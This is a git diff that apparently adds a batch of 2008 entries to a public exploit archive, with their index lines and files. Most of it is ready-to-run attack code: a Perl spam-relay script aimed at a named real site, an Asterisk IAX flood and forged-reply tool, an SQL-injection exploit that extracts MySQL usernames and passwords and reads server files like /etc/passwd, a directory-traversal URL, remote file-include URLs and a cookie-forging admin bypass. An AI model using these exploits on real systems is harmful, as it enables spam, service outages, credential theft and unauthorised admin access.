diff --git a/files.csv b/files.csv index 7d8726e64..3f7eeccd5 100755 --- a/files.csv +++ b/files.csv @@ -28872,3 +28872,11 @@ id,file,description,date,author,platform,type,port 32091,platforms/php/webapps/32091.txt,"MyBlog 0.9.8 Multiple Remote Information Disclosure Vulnerabilities",2008-07-21,"AmnPardaz Security Research Team",php,webapps,0 32092,platforms/php/webapps/32092.txt,"Flip 3.0 'config.php' Remote File Include Vulnerability",2008-07-21,Cru3l.b0y,php,webapps,0 32093,platforms/php/webapps/32093.txt,"phpKF 'forum_duzen.php' SQL Injection Vulnerability",2008-07-21,U238,php,webapps,0 +32094,platforms/cgi/webapps/32094.pl,"HiFriend 'cgi-bin/hifriend.pl' Open Email Relay Vulnerability",2008-07-21,Perforin,cgi,webapps,0 +32095,platforms/linux/dos/32095.pl,"Asterisk <= 1.6 IAX 'POKE' Requests Remote Denial of Service Vulnerability",2008-07-21,"Blake Cornell",linux,dos,0 +32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 SQL Injection Vulnerability and Multiple Cross Site Scripting Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 +32097,platforms/php/webapps/32097.txt,"Xoops 2.0.18 modules/system/admin.php fct Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0 +32098,platforms/php/webapps/32098.txt,"Xoops 2.0.18 modules/system/admin.php fct Parameter XSS",2008-07-21,Ciph3r,php,webapps,0 +32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 votepolls.php bbPath[path] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 +32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 config.php bbPath[root_theme] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 +32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 'admin_lng' Cookie Parameter Authentication Bypass Vulnerability",2008-07-21,Ciph3r,php,webapps,0 diff --git a/platforms/cgi/webapps/32094.pl b/platforms/cgi/webapps/32094.pl new file mode 100755 index 000000000..5fc6964d4 --- /dev/null +++ b/platforms/cgi/webapps/32094.pl @@ -0,0 +1,85 @@ +source: http://www.securityfocus.com/bid/30320/info + +HiFriend is prone to an open-email-relay vulnerability. + +An attacker could exploit this issue by constructing a script that would send unsolicited bulk email to an unrestricted amount of email addresses with a forged email address. + +#!/usr/bin/perl +=pod +---------------------------- +------Header Injection------ +---------------------------- + +Script: hifriend.pl +Vendor: Hibyte Software +Version: The free one you get from many webpages +Dork: "hifriend.pl" + "cgi-bin" + +Found & coded by Perforin + +www.DarK-CodeZ.com +www.vx.perforin.de.vu + + +Greetz to: SkyOut,Sph1nX,zer0day,Rayden,Neo2k8,Cactus,MereX and all my Friends out there! +=cut + +use strict; +use warnings; +use IO::Socket::INET; + + +my($MSG,$lngt,$data,$sock,$add,%config); + +# Here%GŽ%@s your Message + +$MSG = <<"TXT"; +arf arf arf +We gotcha! + +Visit http://DarK-CodeZ.com + +German VX Community + +TXT + +# No im not making a friendly Code where you just have to start and type your shit in. +# Use brain.exe to fill in the stuff you need. + +%config = ( +Server => "sweetscents.com", +Path => "/cgi-bin/", +From => "admin".chr(64)."freehostia.com", +To => "Luxpower".chr(64)."web.de", +Name => "Perforin", +MSG => "$MSG" +); + + +$sock = new IO::Socket::INET(PeerAddr => $config{'Server'}, + PeerPort => 80, + Proto => 'tcp', + Timeout => 1) || die("[+] Could not connect!\n"); + + +$data = 'refpage=&reftitle=&Friends='.$config{'To'}.'&SenderName='.$config{'Name'}.'&From='.$config{'From'}.'&PersonalMsg='.$config{'MSG'}; + +$lngt = length($data); + +print $sock "POST $config{'Path'}hifriend.pl?sp=y HTTP/1.1\n"; +print $sock "Host: $config{'Server'}\n"; +print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12\n"; +print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; +print $sock "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\n"; +print $sock "Accept-Encoding: gzip,deflate\n"; +print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n"; +print $sock "Keep-Alive: 300\n"; +print $sock "Connection: keep-alive\n"; +print $sock "Referer: $config{'Server'}/cgi-bin/hifriend.pl\n"; +print $sock "Accept-Language: en-us\n"; +print $sock "Content-Type: application/x-www-form-urlencoded\n"; +print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7. Gecko/20070421 Firefox/2.0.0\n"; +print $sock "Content-Length: $lngt\n\n"; +print $sock "$data\n"; + +print "[+] Done!"; diff --git a/platforms/linux/dos/32095.pl b/platforms/linux/dos/32095.pl new file mode 100755 index 000000000..e08ac53a4 --- /dev/null +++ b/platforms/linux/dos/32095.pl @@ -0,0 +1,260 @@ +source: http://www.securityfocus.com/bid/30321/info + +Asterisk is prone to a remote denial-of-service vulnerability because it fails to handle multiple 'POKE' requests in quick succession. + +Attackers can exploit this issue by sending a persistent stream of 'POKE' requests that will consume processor resources and deny service to legitimate users. + +NOTE: By default, 'POKE' requests are not logged by Asterisk. + +#!/usr/bin/perl -w +#udp IAX ping discovery and injection tool +#Created: Blake Cornell +#Released under no license, use at your own free will +# +# Do not hesitate to show enthusiasm and support +# and help develop this further. + +use strict; +use IO::Socket; +use Getopt::Long; +use Net::Subnets; +use Pod::Usage; + + +my @target_port = (4569); +my @targets = ('127.0.0.1'); + +my $result = GetOptions('port|p=i' => \(my $port = ''), + 'sport|sp=i' => \(my $sport = ''), + 'eport|ep=i' => \(my $eport = ''), + 'source|sip=s' => \(my $source = ''), + 'host|h=s' => \(my $host = ''), + 'inject|in' => \(my $inject = ''), + 'dos' => \(my $dos = ''), + 'timeout|t=i' => \(my $timeout = ''), + 'dundi-check|dundi' => \(my $dundi = ''), + 'verbose|v' => \(my $verbose = ''), + 'help|?' => \(my $help = '')) or pod2usage(2); + +if($help) { printUsage(); } +if($host) { @targets=@{retHosts($host)}; } +if($port) { $target_port[0] = $port; } +if($dundi) { print "DUNDI Option Scan not supported yet."; } +if($source) { print "Setting of the source IP address is only supported +in inject mode"; } + + +if($inject) { + if($verbose) { print "INJECTION MODE"; } + if(!@targets) { + print "\nSet the host ( -h ) option\n"; + return 1; + } + for(my $i=20000;$i<=65535;$i++) { + for(my $j=0;$j<=$#targets;$j++) { + if($verbose) { print $targets[$j]; } + injectIAXPoke($targets[$j],$source,$i,0); + } + #my($target,$source,$port,$timeout,@args)=@_; + } + exit; +} + +if($dos) { + while(1) { + for(my $j=0;$j<=$#targets;$j++) { + if($verbose) { print $targets[$j]; } + dosIAXPoke($targets[$j],4569,$timeout); + } + + } +} + +if($sport ne '' && $eport ne '') { #defined doesn't work for getoptions + #devices are always defined + if($verbose ne '') { print "Scanning Port Range\n"; } + if($eport < $sport) { + my $tmp = $eport; + $eport = $sport; + $sport = $tmp; + } + if($sport < 1) { $sport = 1; } + if($eport > 65535) { $eport = 65535; } + if($timeout ne '' && $verbose ne '') { + if($timeout <= 0) { + $timeout = 1; + } + print "Scanning Ports $sport through $eport\n"; + print "Setting timeout to $timeout\n"; + } + + @target_port=(); + for(my $i=$sport; $i <= $eport; $i++) { + push(@target_port,$i); + } + sendIAXPokes(\@targets,\@target_port); + +}else{ #scanning only default port... + sendIAXPokes(\@targets,\@target_port); +} + +sub sendIAXPokes { + my($targets_ref,$target_ports_ref,@args)=@_; + + my @targets=@{$targets_ref}; + my @target_ports=@{$target_ports_ref}; + + for(my $i=0;$i<=$#targets;$i++) { + for(my $j=0;$j<=$#target_ports;$j++) { + +sendIAXPoke($targets[$i],$target_ports[$j],$timeout); + } + } +} + +sub sendIAXPoke { + my($target,$port,$timeout,@args)=@_; + + if($verbose) { + print "Trying $target:$port\n"; + + } + socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp")); + + my $src_call = "8000"; + my $dst_call = "0000"; + my $timestamp = "00000000"; + my $outbound_seq = "00"; + my $inbound_seq = "00"; + my $type = "06"; #IAX_Control + my $iax_type = "1e"; #POKE + my $msg = pack "H24", $src_call . $dst_call . $timestamp . +$outbound_seq . $inbound_seq . $type . $iax_type; + + my $ipaddr = inet_aton($target); + my $sin = sockaddr_in($port,$ipaddr); + + send(PING, $msg, 0, $sin) == length($msg) or die "cannot send to +$target : $port : $!\n"; + + my $MAXLEN = 1024; + my $TIMEOUT = 1; + if(defined($timeout) && $timeout ne '' && $timeout != 0) { +#timeout of 0 hangs + +#unanswered requests + $TIMEOUT=$timeout; + } + eval { + local $SIG{ALRM} = sub { die "alarm time out"; }; + alarm $TIMEOUT; + + while (1) { + my $recvfrom = recv(PING, $msg, $MAXLEN, 0) or +die "recv: $!"; + ($port, $ipaddr) = sockaddr_in($recvfrom); + my $respaddr = inet_ntoa($ipaddr); + print "Response from $respaddr : $port\n"; + return($respaddr,$port); + } + + }; +} + +sub injectIAXPoke { + my($target,$source,$port,$timeout,@args)=@_; + + socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp")); + + my $src_call = "8000"; + my $dst_call = "0000"; + my $timestamp = "00000000"; + my $outbound_seq = "00"; + my $inbound_seq = "01"; #increment by one did he say? + my $type = "06"; #IAX_Control + my $iax_type = "03"; #PONG + my $msg = pack "H24", $src_call . $dst_call . $timestamp . +$outbound_seq . $inbound_seq . $type . $iax_type; + + my $targetIP = inet_aton($target); + my $sin = sockaddr_in($port,$targetIP); + + send(PING, $msg, 0, $sin) == length($msg) or die "cannot send to +$target : $port : $!\n"; +} + +sub retHosts { + my($host,@args)=@_; + my @addrs; + + if(!$host) { return ('127.0.0.1') }; + + if($host =~ +/^([\d]{1,3}).([\d]{1,3}).([\d]{1,3}).([\d]{1,3})\/([\d]{1,2})$/ && $1 +>= 0 && $1 <= 255 && $2 >= 0 && $2 <= 255 && $3 >= 0 && $3 <= 255 && $4 +>= 0 && $4 <= 255) { + #Check to see if host is valid +class C CIDR Address + if($verbose) { print "Setting CIDR Address Range\n"; } + my $sn = Net::Subnets->new; + + my($low,$high)=$sn->range(\$host); + if($verbose) { print "Determined IP Ranges From $$low - +$$high\n"; } + return \@{ $sn->list(\($$low,$$high)) }; + + }elsif($host =~ +/^([\d]{1,3}).([\d]{1,3}).([\d]{1,3}).([\d]{1,3})$/ && $1 >= 0 && $1 <= +255 && $2 >= 0 && $2 <= 255 && $3 >= 0 && $3 <= 255 && $4 >= 0 && $4 <= +255) { + #Check to see if host is valid +IP + push(@addrs,"$1.$2.$3.$4"); + }else{ + push(@addrs,$host); + } + return \@addrs; +} + +sub dosIAXPoke { + my($target,$port,$timeout,@args)=@_; + + if($verbose) { + print "Trying $target:$port\n"; + + } + socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp")); + + my $src_call = "8000"; + my $dst_call = "0000"; + my $timestamp = "00000000"; + my $outbound_seq = "00"; + my $inbound_seq = "00"; + my $type = "06"; #IAX_Control + my $iax_type = "1e"; #POKE + my $msg = pack "H24", $src_call . $dst_call . $timestamp . +$outbound_seq . $inbound_seq . $type . $iax_type; + + my $ipaddr = inet_aton($target); + my $sin = sockaddr_in($port,$ipaddr); + + send(PING, $msg, 0, $sin) == length($msg) or die "cannot send to +$target : $port : $!\n"; +} + + +sub printUsage { + print "$0 -h remoteorigin.com \n\t\tScans remoteorigin.com on +default port of 4569\n"; + print "$0 -h remoteorigin.com -sp 4000 -ep 5000\n\t\tScans ports +4000 through 5000 on server remoteorigin.com\n"; + print "$0 --source remoteorigi.com -h 127.0.0.1 +--inject\n\t\tInjects Forged Poke Replies to 127.0.0.1 from +remoteorigin.com\n"; + print "$0 --dos\n\t\tThis will continually send IAX Poke +packets. This will eat up CPU cycles and isn't logged by default\n"; + exit; +} + + + diff --git a/platforms/php/webapps/32096.pl b/platforms/php/webapps/32096.pl new file mode 100755 index 000000000..1d3fec6e7 --- /dev/null +++ b/platforms/php/webapps/32096.pl @@ -0,0 +1,206 @@ +source: http://www.securityfocus.com/bid/30328/info + +EasyE-Cards is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and multiple cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +EasyE-Cards 3.10a is vulnerable; other versions may also be affected. + + +#!/usr/bin/perl +#---------------------------------------------------------------- +# +#Script : Easyecards 310a +# +#Type : Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) +# +#Variable Method : GET +# +#Alert : High +# +#---------------------------------------------------------------- +# +#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash +# +#My Offical Website : HTTP://FEREIDANI.IR +# +#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com +# +#---------------------------------------------------------------- +# +#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR +# +#---------------------------------------------------------------- +# +#Script Download : http://myiosoft.com/download/EasyE-Cards/easyecards-310a.zip +# +#---------------------------------------------------------------- +#Xss 1 : http://www.example.com/?ResultHtml= +# +#Xss 2 : http://www.example.com/index.php?step=2&dir=<>>>>''" +# +#Xss 3 : http://www.example.com/index.php?step=2&SenderName=<>>>>''" +# +#Xss 4 : http://www.example.com/index.php?step=2&RecipientName=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E +# +#Xss 5 : http://www.example.com/index.php?step=2&SenderMail=<>>>>''" +# +#Xss 6 : http://www.example.com/index.php?step=2&RecipientMail=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E +# +#---------------------------------------------------------------- +# +#SQL Injection : +# +#SQL 1 : http://www.example.com/index.php?show=pickup&sid=99999'+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13/* +# +# +#---------------------------------------------------------------- +# +# Tnx : God +# +# HTTP://IRCRASH.COM +# +#---------------------------------------------------------------- + + +use LWP; +use HTTP::Request; +use Getopt::Long; +sub header +{ +print " +**************************************************** +* Easyecards 310a Exploit * +**************************************************** +*Discovered by : Khashayar Fereidani * +*Exploited by : Khashayar Fereidani * +*My Official Website : http://fereidani.ir * +****************************************************"; +} + +sub usage +{ + print " +* Usage : perl $0 http://Example/ +**************************************************** +"; +} + + +$url = ($ARGV[0]); + +if(!$url) +{ +header(); +usage(); +exit; +} +if($url !~ /\//){$url = $url."/";} +if($url !~ /http:\/\//){$url = "http://".$url;} +sub xpl1() +{ +$vul = +"?show=pickup&sid=99999'+union+select+0,concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),2,3,4,5,6 +,7,8,9,10,11,12,13+from+mysql.user/*"; +$requestpage = $url.$vul; +my $req = HTTP::Request->new("POST",$requestpage); +$ua = LWP::UserAgent->new; +$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); +#$req->referer($url); +$req->referer("IRCRASH.COM"); +$req->content_type('application/x-www-form-urlencoded'); +$req->header("content-length" => $contlen); +$req->content($poststring); + +$response = $ua->request($req); +$content = $response->content; +$header = $response->headers_as_string(); + +@name = split(/Login:/,$content); +$name = @name[1]; +@name = split(//,$name); +$name = @name[0]; + +@password = split(/Password:/,$content); +$password = @password[1]; +@password = split(//,$password); +$password = @password[0]; + +if(!$name && !$password) +{ +print "\n\n"; +print "!Exploit failed ! :(\n\n"; +exit; +} + +print "\n Username: ".$name."\n\n"; +print " Password: " .$password."\n\n"; + + +} +#XPL2 + +sub xpl2() +{ +print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd"; +print "\n Enter File Address :"; +$fil3 = ; + +$vul = +"?show=pickup&sid=99999'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*"; +$requestpage = $url.$vul; + +my $req = HTTP::Request->new("POST",$requestpage); +$ua = LWP::UserAgent->new; +$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); +#$req->referer($url); +$req->referer("IRCRASH.COM"); +$req->content_type('application/x-www-form-urlencoded'); +$req->header("content-length" => $contlen); +$req->content($poststring); + +$response = $ua->request($req); +$content = $response->content; +$header = $response->headers_as_string(); + + +@name = split(/Login:/,$content); +$name = @name[1]; +@name = split(//,$name); +$name = @name[0]; + + +if(!$name && !$password) +{ +print "\n\n"; +print "!Exploit failed ! :(\n\n"; +exit; +} + +open (FILE, ">".source.".txt"); +print FILE $name; +close (FILE); +print " File Save In source.txt\n"; +print ""; + +} + +#XPL2 END +#Starting; +print " +**************************************************** +* Easyecards 310a Exploit * +**************************************************** +*Discovered by : Khashayar Fereidani * +*Exploited by : Khashayar Fereidani * +*My Official Website : http://fereidani.ir * +**************************************************** +* Mod Options : * +* Mod 1 : Find mysql username and root password * +* Mod 2 : Save PHP config source in your system * +****************************************************"; +print "\n \n Enter Mod : "; +$mod=; +if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; }; +if ($mod=="1") { xpl1(); }; +if ($mod=="2") { xpl2(); }; diff --git a/platforms/php/webapps/32097.txt b/platforms/php/webapps/32097.txt new file mode 100755 index 000000000..0ed5e0e45 --- /dev/null +++ b/platforms/php/webapps/32097.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/30330/info + +XOOPS is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit the local file-include vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks. + +The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +XOOPS 2.0.18.1 is vulnerable; other versions may also be affected. + +http://www.example.com/scripts_path/modules/system/admin.php?fct=../../../../../../../../../../etc/passwd%00 diff --git a/platforms/php/webapps/32098.txt b/platforms/php/webapps/32098.txt new file mode 100755 index 000000000..a1f656d2f --- /dev/null +++ b/platforms/php/webapps/32098.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/30330/info + +XOOPS is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit the local file-include vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks. + +The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +XOOPS 2.0.18.1 is vulnerable; other versions may also be affected. + +http://www.example.com/scripts_path/modules/system/admin.php?fct="> \ No newline at end of file diff --git a/platforms/php/webapps/32099.txt b/platforms/php/webapps/32099.txt new file mode 100755 index 000000000..563c8a30d --- /dev/null +++ b/platforms/php/webapps/32099.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30331/info + +RunCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +RunCMS 1.6.1 is vulnerable; other versions may be affected as well. + +http://www.example.com/modules/newbb_plus/votepolls.php?bbPath[path]=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/32100.txt b/platforms/php/webapps/32100.txt new file mode 100755 index 000000000..b323e16d9 --- /dev/null +++ b/platforms/php/webapps/32100.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30331/info + +RunCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +RunCMS 1.6.1 is vulnerable; other versions may be affected as well. + +http://www.example.com/modules/newbb_plus/config.php?bbPath[root_theme]=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/32101.txt b/platforms/php/webapps/32101.txt new file mode 100755 index 000000000..2ed68ade7 --- /dev/null +++ b/platforms/php/webapps/32101.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30332/info + +eSyndiCat is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication. + +An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible. + +eSyndiCat 1.6 is vulnerable; other versions may also be affected. + +javascript:document.cookie = "admin_lng=1; path=/"; \ No newline at end of file